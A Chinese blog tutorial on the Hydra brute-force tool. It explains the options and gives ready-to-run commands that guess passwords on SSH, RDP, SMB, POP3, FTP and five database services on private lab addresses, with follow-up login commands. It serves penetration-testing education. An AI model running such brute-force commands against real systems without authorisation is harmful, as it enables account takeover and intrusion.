应用协议安全:Hydra 端口爆破工具.(九头蛇)

这篇具有很好参考价值的文章主要介绍了应用协议安全:Hydra 端口爆破工具.(九头蛇)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

应用协议安全:Hydra 端口爆破工具.(九头蛇)

Hydra 也叫九头蛇,是一款开源的暴力PJ工具,集成在kali当中。可以对多种服务的账号和密码进行爆破,包括 Web 登录、数据库、SSH、FTP 等服务.


目录:

应用协议安全:Hydra 端口爆破工具.(九头蛇)

Hydra(九头蛇)使用:

使用方法:直接打开 kali 终端,输入.

(1)实战:爆破 SSH 协议.( 22 端口 )

(2)实战:爆破 远程桌面 RDP.( 3389 端口 )

(3)实战:爆破 共享文件 SMB ( 445 端口 )

(4)实战:爆破 邮箱协议 POP3( 110 端口 )

(5)实战:爆破 文件传输 FTP ( 21 端口 )

(6)实战:爆破 MSSQL数据库( 1433 端口 )

(7)实战:爆破 MySQL数据库( 3306 端口 )

(8)实战:爆破 Oracle数据库( 1521 端口 )

(9)实战:爆破 Redis数据库( 6379 端口 )

(10)实战:爆破 PgSQL数据库( 5432 端口 )


免责声明:

严禁利用本文章中所提到的技术进行非法攻击,否则后果自负,上传者不承担任何责任。


Hydra(九头蛇)使用的参数:

-s 指定端口

-l 指定用户名

-L 指定用户名字典(文件)

-p 指定密码破解

-P 指定密码字典(文件)

-o 保存执行结果

-e 空密码探测和指定用户密码探测(ns)

-C 用户名可以用:分割(username:password)

-vV 显示详细过程

Hydra(九头蛇)使用:

使用方法:直接打开 kali 终端,输入.

hydra

hydra工具rdesktop,渗透测试 领域.,# 安全测试工具领域.,# 服务攻防 领域.,web安全,linux,安全,网络安全


(1)实战:爆破 SSH 协议.( 22 端口 )

hydra -L /root/root.txt -P /root/root.txt 192.168.0.105 ssh

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

hydra工具rdesktop,渗透测试 领域.,# 安全测试工具领域.,# 服务攻防 领域.,web安全,linux,安全,网络安全

ssh iwebsec@192.168.0.105            //登录 ssh (22端口)

ssh 账号@地址

hydra工具rdesktop,渗透测试 领域.,# 安全测试工具领域.,# 服务攻防 领域.,web安全,linux,安全,网络安全


(2)实战:爆破 远程桌面 RDP.( 3389 端口 )

hydra -l administrator -P /root/root.txt 192.168.0.106 rdp -vV

-l 指定用户名

-P 指定密码字典(文件)

-vV 显示详细过程

hydra工具rdesktop,渗透测试 领域.,# 安全测试工具领域.,# 服务攻防 领域.,web安全,linux,安全,网络安全

rdesktop 192.168.0.106:3389        //登录远程桌面3389

rdesktop 地址:3389 

hydra工具rdesktop,渗透测试 领域.,# 安全测试工具领域.,# 服务攻防 领域.,web安全,linux,安全,网络安全


(3)实战:爆破 共享文件 SMB ( 445 端口 )

hydra -l administrator -P /root/root.txt 192.168.0.106 smb

-l 指定用户名

-P 指定密码字典(文件)

hydra工具rdesktop,渗透测试 领域.,# 安全测试工具领域.,# 服务攻防 领域.,web安全,linux,安全,网络安全


(4)实战:爆破 邮箱协议 POP3( 110 端口 )

hydra  -L /root/root.txt -P /root/root.txt 192.168.0.105 pop3 -vV

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程

(5)实战:爆破 文件传输 FTP ( 21 端口 )

hydra  -L /root/root.txt -P /root/root.txt 192.168.0.105 ftp -vV

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程

(6)实战:爆破 MSSQL数据库( 1433 端口 )

hydra -l sa -P /root/root.txt 192.168.0.106 mssql -vV 

-l 指定用户名

-P 指定密码字典(文件)

-vV 显示详细过程

(7)实战:爆破 MySQL数据库( 3306 端口 )

hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 mysql -vV 

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程

(8)实战:爆破 Oracle数据库( 1521 端口 )

hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 oracle -vV 

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程

(9)实战:爆破 Redis数据库( 6379 端口 )

hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 redis -vV 
 
-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程

(10)实战:爆破 PgSQL数据库( 5432 端口 )

hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 postgresql -vV

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程

     

      文章来源地址https://www.toymoban.com/news/detail-786955.html

      

到了这里,关于应用协议安全:Hydra 端口爆破工具.(九头蛇)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 第六天 01-hydra工具windows远程桌面的密码爆破

    RDP是Windows的远程桌面协议。所占用的端口默认为3389,这个是可以修改的。 爆破工具:kali使用hydra(九头蛇)工具进行密码爆破。 hydra语法: ​ hydra IP地址 rdp -l 用户名 -P 密码字典 -V rdp 即RDP协议 -l 小写的l 后面加单用户名,已知用户名 -L 大写的L后面加的是用户名字典,破

    2023年04月08日
    浏览(51)
  • Day84:服务攻防-端口协议&桌面应用&QQ&WPS等RCE&hydra口令猜解&未授权检测

    目录 端口协议-口令爆破未授权 弱口令爆破 FTP:文件传输协议 RDP:Windows远程桌面协议 SSH:Linux安全外壳协议 未授权案例(rsync) 桌面应用-QQWPSClash QQ RCE 漏洞复现 WPS RCE 漏洞复现 Clas* RCE 漏洞复现 知识点; 1 、端口协议 - 弱口令 未授权 攻击方式等 2 、桌面应用 - 社交类 文档类

    2024年04月11日
    浏览(36)
  • Hydra post登录框爆破

    登录一个无验证码和token的页面,同时抓包拦截 取出发送数据包:username=adbpassword=133submit=Login 将用户名和密码替换 username= USER password= PASS submit=Login 同时获取路径:/pikachu/vul/burteforce/bf_form.php 拼接发送数据后就是: /pikachu/vul/burteforce/bf_form.php:username= USER password= PASS submit=Logi

    2024年02月06日
    浏览(52)
  • 使用hydra进行SSH爆破

    SSH(Secure Shell,安全外壳)是一种网络安全协议,通过加密和认证机制实现安全的访问和文件传输等业务。传统远程登录或文件传输方式,例如Telnet、FTP,使用明文传输数据,存在很多的安全隐患。随着人们对网络安全的重视,这些方式已经慢慢不被接受。SSH协议通过对网络

    2024年02月12日
    浏览(44)
  • ssh渗透与hydra爆破(简明不啰嗦)

    适合新手上路,MSF与hydra两种方式渗透22端口,后进行远程连接,如有不足请各位见谅 此次实验仅供参考,切勿做违法犯罪,出事一切与本人无关后果自负,希望大家早日成为白帽子。 渗透机:kali 靶机:192.168.75.128 1.扫描局域网寻找22端口(开放) nmap 192.168.75.1/24 2.已知192.1

    2024年02月04日
    浏览(46)
  • 使用kali+hydra爆破win7用户密码

    破坏计算机信息系统罪 《中华人民共和国刑法》第二百八十六条 违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。 违反国家规定,

    2024年02月06日
    浏览(54)
  • 黑客必备工具:Hydra的完整安装和使用指南

      1.安装必要的依赖库 在终端中执行以下命令,安装Hydra所需的依赖库: 2.下载Hydra 你可以从Hydra的官方网站( https://github.com/vanhauser-thc/thc-hydra)下载最新版本的Hydra。下载完成后,将压缩包解压到任意目录。 3.编译并安装Hydra 在终端中进入Hydra的解压目录,执行以下命令:

    2024年02月06日
    浏览(61)
  • 九头蛇3389远程爆破

    1.初学KALI hydra(海德拉)。 实验环境:VM16,虚拟机两台,Windows10系统,KALI系统,用nmap查看目标端口是否开放。 2.在KALI虚拟机上面使用命令nmap查看WIN10的3389端口是否打开。 3.在KALI虚拟机上面建立用户名和密码两个弱口令的文本文件。 4.使用海德拉工具Hydra(海德拉)工具进行

    2024年02月04日
    浏览(26)
  • Hydra 用于深度学习实验管理

    Hydra 用于深度学习实现管理 在深度学习实验中设置参数的痛点 参数没有结构,检查查看不方便 不同的模块,例如:loss,需要的参数不同,每次修改loss,连带着改参数;更好的方案是,只修改lossname,其他参数跟着上来就行 不同实验只需修改少量参数,但是需要**检查是否有

    2023年04月08日
    浏览(41)
  • 渗透测试-暴力破解之hydra

    暴力破解攻击是指攻击者通过系统地组合所有可能性(例如登录时用到的账户名、密码),尝试所有的可能性破解用户的账户名、密码等敏感信息。攻击者会经常使用自动化脚本组合出正确的用户名和密码。 kali自带的hydra hydra -l root -p root 172.26.2.36 ssh -l 指定用户名 -L 指定用

    2024年02月08日
    浏览(54)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包